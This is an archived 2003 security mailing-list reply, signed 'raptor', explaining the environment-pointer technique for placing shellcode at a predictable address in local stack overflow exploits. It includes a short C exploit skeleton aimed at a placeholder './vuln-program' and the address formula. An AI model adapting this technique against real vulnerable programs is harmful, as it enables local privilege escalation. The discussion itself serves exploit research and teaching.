On Mon, 24 Mar 2003 steveat_private wrote: > That wasn't the part that I was considering as being novel. > > When I've coded things before I've spent most of my time determinig > where the return address lies within the area I've overflowed. (By > doing a binary search of my 'XXXXXX's). > > I was thinking that by knowing the address of the buffer in the > processes memory space this would reduce the number of trials down > to four. (To deal with alignment issues). If you are exploiting a local vulnerability you can also use the even simpler env pointer technique to locate the shellcode. int main() { char *env[2] = {sc, NULL}; char buf[BUF]; int i; int *ap = (int *)(buf + ALIGN); int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program"); for (i = 0; i < BUF - 1; i += 4) *ap++ = ret; *ap = 0x0; execle("./vuln-program", "vuln-program", buf, NULL, env); } As you can see, for ./vuln-program shellcode will always be at: 0xbffffffa - strlen(sc) - strlen("./vuln-program") Cheers, :raptor Antifork Research, Inc. 0xdeadbeef | raptor's labs http://www.antifork.org http://www.0xdeadbeef.info
This archive was generated by hypermail 2b30 : Mon Mar 24 2003 - 20:38:21 PST